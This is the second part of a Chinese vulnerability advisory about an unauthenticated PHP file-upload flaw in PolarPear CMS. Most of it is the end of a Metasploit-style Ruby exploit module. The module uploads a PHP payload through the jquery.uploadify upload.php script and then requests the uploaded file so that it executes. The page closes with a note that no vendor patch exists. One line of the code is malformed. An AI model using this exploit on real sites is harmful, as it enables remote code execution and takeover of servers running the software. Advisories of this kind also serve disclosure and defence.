PolarPear CMS PHP文件上传漏洞(2)

data = Rex::MIME::Message.new
        data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
        data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"")
        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
        print_status("#{peer} - Uploading payload #{@payload_name}")
        res = send_request_cgi({
            'method' => 'POST',
            'uri'    => normalize_uri(uri, 'includes', 'jquery.uploadify', "upload.php?folder=#{upload_dir}"),
            'ctype'  => "multipart/form-data; boundary=#{data.bound}",
            'data'  => post_data
        })
        if not res or res.code != 200
            fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
        end

upload_uri = "#{upload_dir}#{@payload_name}"
        print_status("#{peer} - Executing payload #{@payload_name}")
        res = send_request_raw({
            'uri'    => upload_uri,
            'method' => 'GET'
        })
    end
 end

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
PolarPearCms
 ------------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
https://code.google.com/p/polarbearcms/

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://127.0.0.1/wyydzj.html